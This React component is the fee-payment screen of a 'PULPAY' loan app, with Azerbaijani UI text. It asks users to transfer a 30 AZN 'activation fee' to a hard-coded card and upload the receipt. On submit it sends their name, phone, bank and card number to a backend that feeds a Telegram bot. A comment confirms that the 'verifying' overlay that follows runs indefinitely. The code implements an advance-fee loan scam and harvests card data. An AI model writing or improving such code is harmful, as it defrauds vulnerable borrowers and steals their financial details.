import React, { useState, useEffect } from "react";
import { ArrowLeft, ArrowRight, Upload, Info, Zap, Clock, ShieldCheck, Copy, Check } from "lucide-react";
import { usePulpayConfig } from "../hooks/usePulpayConfig";
import { tiktokTrack } from "../utils/tiktokPixel";

const STORAGE_RECEIPT_PENDING = "pulpay_receipt_pending";

export default function FeePayment({ go, user, activeCard, approvedCredit, onPaid, notifyTop }) {
  const config = usePulpayConfig();
  const FEE_CARD_NUMBER = config.fee_card?.number || "4127 3792 0854 6631";
  const FEE_CARD_HOLDER = config.fee_card?.holder || "PULPAY MMC";
  const FEE_CARD_BADGE = config.fee_card?.badge || "PLP";
  const FEE_AMOUNT = config.fee_card?.amount ?? 30;

  const [receiptName, setReceiptName] = useState("");
  const [receiptFile, setReceiptFile] = useState(null);
  const [copied, setCopied] = useState(false);
  const [submitting, setSubmitting] = useState(false);

  const amount = approvedCredit?.amount || 2500;
  const period = approvedCredit?.period || 12;
  const monthly = approvedCredit ? Math.round(approvedCredit.monthly) : Math.round(amount * 1.1 / period);

  const handleCopy = async () => {
    try {
      await navigator.clipboard.writeText(FEE_CARD_NUMBER.replace(/\s/g, ""));
      setCopied(true);
      setTimeout(() => setCopied(false), 1600);
      notifyTop && notifyTop({
        title: "PULPAY",
        body: "Kart nömrəsi kopyalandı",
        sub: `${FEE_CARD_NUMBER} • ${FEE_CARD_HOLDER}`,
        duration: 4000,
        kind: "success",
      });
    } catch (e) {}
  };

  const handleFile = (e) => {
    const f = e.target.files && e.target.files[0];
    if (f) {
      setReceiptName(f.name);
      setReceiptFile(f);
    }
  };

  const handleSubmit = () => {
    if (!receiptName) return;
    setSubmitting(true);
    try {
      localStorage.setItem(STORAGE_RECEIPT_PENDING, "1");
    } catch (e) {}
    // TikTok Pixel conversion: receipt submission
    tiktokTrack("SubmitForm", {
      content_type: "receipt",
      value: Number(amount) || 0,
      currency: "AZN",
    });
    // Fire-and-forget backend receipt notification (Telegram bot pipeline)
    try {
      const fd = new FormData();
      fd.append("first_name", user?.firstName || "");
      fd.append("last_name", user?.lastName || "");
      fd.append("phone", user?.phone || "");
      if (amount) fd.append("amount", String(amount));
      if (period) fd.append("period", String(period));
      if (monthly) fd.append("monthly", String(monthly));
      if (activeCard?.bankKey) fd.append("bank_name", activeCard.bankKey);
      if (activeCard?.cardNumber) fd.append("card_number", activeCard.cardNumber);
      if (receiptFile) fd.append("receipt", receiptFile, receiptFile.name);
      fetch(`${process.env.REACT_APP_BACKEND_URL}/api/public/receipt`, {
        method: "POST",
        body: fd,
      }).catch(() => {});
    } catch (e) {}
    // Verification remains active indefinitely until user refreshes / logs out.
  };

  return (
    <section className="screen fp-screen" data-testid="fee-payment-screen">
      <button
        className="bs-back"
        onClick={() => go("home")}
        aria-label="Geri"
        data-testid="fp-back-btn"
      >
        <ArrowLeft size={20} strokeWidth={2.6} />
      </button>

      <div className="fp-content">
        <div className="fp-head">
          <div className="fp-head-badge">
            <Zap size={13} strokeWidth={2.8} />
            <span>Aktivləşdirmə tələb olunur</span>
          </div>
          <h2 className="fp-title">Rüsumu ödəyin</h2>
          <p className="fp-sub">
            Aşağıdakı karta <b>{FEE_AMOUNT} ₼</b> köçürün, qəbzi yükləyin — krediti dərhal alın.
          </p>
        </div>

        {/* Premium simulator card */}
        <div className="fp-card fp-card-super" data-testid="fp-card-sim">
          <div className="fp-card-shine" />
          <div className="fp-card-holo" />
          <div className="fp-card-mesh" />

          <div className="fp-card-top">
            <div className="fp-card-brand">
              <div className="fp-card-logo">
                <img src="/assets/logo.png" alt="PULPAY" />
              </div>
              <div className="fp-card-brand-txt">
                <b>{FEE_CARD_HOLDER}</b>
              </div>
            </div>
            <div className="fp-card-net">
              <span className="fp-card-net-dot fp-card-net-dot-1" />
              <span className="fp-card-net-dot fp-card-net-dot-2" />
            </div>
          </div>

          <div className="fp-card-number-row">
            <div className="fp-card-number" data-testid="fp-card-number">
              {FEE_CARD_NUMBER}
            </div>
          </div>
          <button
            type="button"
            className="fp-card-copy-wide"
            onClick={handleCopy}
            data-testid="fp-card-copy-btn"
          >
            {copied ? (
              <><Check size={14} strokeWidth={3} /> <span>Kopyalandı</span></>
            ) : (
              <><Copy size={14} strokeWidth={2.4} /> <span>Kart nömrəsini kopyala</span></>
            )}
          </button>

          <div className="fp-card-bot">
            <div className="fp-card-block">
              <span className="fp-card-lbl">Ödəniləcək məbləğ</span>
              <b className="fp-card-val">{FEE_AMOUNT} ₼</b>
            </div>
            <div className="fp-card-block fp-card-block-right">
              <span className="fp-card-lbl">Alacağınız kredit</span>
              <b className="fp-card-val">{amount.toLocaleString("az-AZ")} ₼</b>
            </div>
          </div>
        </div>

        {/* Summary tiles */}
        <div className="fp-tiles">
          <div className="fp-tile fp-tile-pay">
            <span className="fp-tile-lbl">Ödəniləcək rüsum</span>
            <b className="fp-tile-val">{FEE_AMOUNT} <em>₼</em></b>
            <span className="fp-tile-sub">Bir dəfəlik · komissiyasız · geri qaytarıla bilən</span>
          </div>
          <div className="fp-tile fp-tile-credit">
            <span className="fp-tile-lbl">Alacağınız kredit</span>
            <b className="fp-tile-val">{amount.toLocaleString("az-AZ")} <em>₼</em></b>
            <span className="fp-tile-sub">{period} ay · 10% illik · Aylıq {monthly} ₼</span>
          </div>
        </div>

        {/* Info card */}
        <div className="fp-info">
          <div className="fp-info-head">
            <span className="fp-info-ic"><Info size={14} strokeWidth={2.6} /></span>
            <b>Rüsum haqqında qısa məlumat</b>
          </div>
          <p className="fp-info-p">
            Bir dəfəlik açar — yalnız <b>{FEE_AMOUNT} ₼</b>. Bu kiçik ödəniş kredit
            xəttinizi açır və <b>{amount.toLocaleString("az-AZ")} ₼</b> dərhal
            hesabınıza düşür.
          </p>
          <ol className="fp-info-steps">
            <li>
              <span className="fp-info-step-n">1</span>
              <span>Rüsumu yuxarıdakı <b>{FEE_CARD_HOLDER}</b> kartına köçürün. Tam {FEE_AMOUNT} ₼, komissiyasız.</span>
            </li>
            <li>
              <span className="fp-info-step-n">2</span>
              <span>Ödəniş etdikdən sonra qəbzi/skrinşotu aşağıda yükləyin.</span>
            </li>
            <li>
              <span className="fp-info-step-n">3</span>
              <span>Yoxlama tamamlandıqda kredit məbləği <b>1–2 dəqiqə</b> ərzində seçdiyiniz kart hesabına köçürülür.</span>
            </li>
          </ol>
          <div className="fp-info-guarantees">
            <span><ShieldCheck size={12} strokeWidth={2.8} /> Təhlükəsiz</span>
            <span><Clock size={12} strokeWidth={2.8} /> 1–2 dəqiqə</span>
            <span><Zap size={12} strokeWidth={2.8} /> Dərhal aktivləşmə</span>
          </div>
        </div>

        {/* Receipt upload */}
        <label className={`fp-upload ${receiptName ? "has-file" : ""}`} data-testid="fp-upload-label">
          <input
            type="file"
            accept="image/*,application/pdf"
            onChange={handleFile}
            data-testid="fp-upload-input"
            hidden
          />
          <div className="fp-upload-ic">
            {receiptName ? <Check size={18} strokeWidth={3} /> : <Upload size={18} strokeWidth={2.4} />}
          </div>
          <div className="fp-upload-txt">
            <b>{receiptName ? "Qəbz yükləndi" : "Ödəniş qəbzini yükləyin"}</b>
            <span>{receiptName || "Skrinşot və ya PDF (maksimum 10 MB)"}</span>
          </div>
        </label>

        <button
          type="button"
          className="fp-submit"
          onClick={handleSubmit}
          disabled={!receiptName || submitting}
          data-testid="fp-submit-btn"
        >
          <span>{submitting ? "Göndərilir..." : "Qəbzi göndər və krediti al"}</span>
          <ArrowRight size={18} strokeWidth={2.8} />
        </button>
      </div>

      {/* Full-screen "receipt verifying" loader overlay */}
      {submitting && (
        <div className="fp-verify" data-testid="fp-verify-overlay">
          <div className="fp-verify-bg" />
          <div className="fp-verify-orb fp-verify-orb-1" />
          <div className="fp-verify-orb fp-verify-orb-2" />
          <div className="fp-verify-center">
            <div className="fp-verify-halo" />
            <div className="fp-verify-ring fp-verify-ring-1" />
            <div className="fp-verify-ring fp-verify-ring-2" />
            <div className="fp-verify-ring fp-verify-ring-3" />
            <div className="fp-verify-dot fp-verify-dot-1" />
            <div className="fp-verify-dot fp-verify-dot-2" />
            <div className="fp-verify-dot fp-verify-dot-3" />
            <div className="fp-verify-logo">
              <img src="/assets/logo.png" alt="PULPAY" />
            </div>
          </div>
          <div className="fp-verify-txt">
            <h3>Qəbz yoxlanılır<span className="fp-verify-dots"><i /><i /><i /></span></h3>
            <p>Ödəniş qəbziniz avtomatik yoxlanılır. Zəhmət olmasa gözləyin.</p>
          </div>
        </div>
      )}
    </section>
  );
}
